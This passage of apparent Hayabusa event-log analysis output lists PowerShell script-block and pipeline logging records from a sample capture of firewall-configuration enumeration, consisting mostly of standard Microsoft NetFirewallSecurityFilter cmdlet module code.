[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) 
$__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSecurityFilter' function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query 
(cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', 
${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } 
else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterTyp",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"e = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; 
value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 
name=""Function""; value=""Get-NetFirewallSecurityFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSecurityFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, 
$script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 
16:23:05.895 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject 
